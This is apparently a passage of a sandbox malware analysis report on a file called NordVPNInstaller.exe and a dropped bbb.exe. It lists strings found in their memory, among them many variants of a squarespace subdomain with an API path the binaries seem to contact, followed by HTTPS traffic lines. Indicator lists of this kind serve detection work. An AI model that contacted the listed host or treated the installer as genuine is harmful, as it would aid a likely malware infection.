Source: bbb.exe, 00000004.00000002.3072073018.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2131657052.0000000001200000.00000004.00000020.00020000.00000000.sdmp, NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: NordVPNInstaller.exe, 00000000.00000002.2764791326.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3072073018.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2131657052.0000000001200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsig
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: bbb.exe, 00000004.00000002.3072073018.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2131657052.0000000001200000.00000004.00000020.00020000.00000000.sdmp, NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: bbb.exe, 00000004.00000002.3072073018.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2131657052.0000000001200000.00000004.00000020.00020000.00000000.sdmp, NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: NordVPNInstaller.exe, 00000000.00000002.2778376127.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.c
Source: bbb.exe, 00000004.00000002.3072073018.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.000000000371D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespac
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000036F1000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000003721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&.
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&:
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&;
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&_
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd&r
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.3
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.9
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.V
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.k
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd.z
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2&
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2C
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd2g
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd6
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd60
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd6T
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd6d
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd:
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd:A
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdB
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdBu
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdF
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdFV
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdFm
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJ
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJM
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJZ
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJn
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdJs
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdN
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdNG
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdR
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdR4
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdRF
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdRM
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdRg
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdRj
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdV
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdV:
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdVQ
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdVW
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdZ
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdZ?
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdZD
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdZh
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdb
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdb3
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdb8
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdbB
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdbE
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdbY
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdb_
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdf
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdf/
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdfL
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdfP
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdj
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdj1
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdj9
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdn
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdn&
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdnI
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdr
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdrf
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdv
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdvB
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdvz
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdz
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacdzv
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~;
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~c
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespacd~s
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespace.com
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000003020000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000036F1000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, NordVPNInstaller.exe, 00000000.00000002.2765864520.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000003394000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000003355000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://plantain-elk-b8pt.squarespace.com$
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: https://plantain-elk-b8pt.squarespace.com/api/comment/FlagComment
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
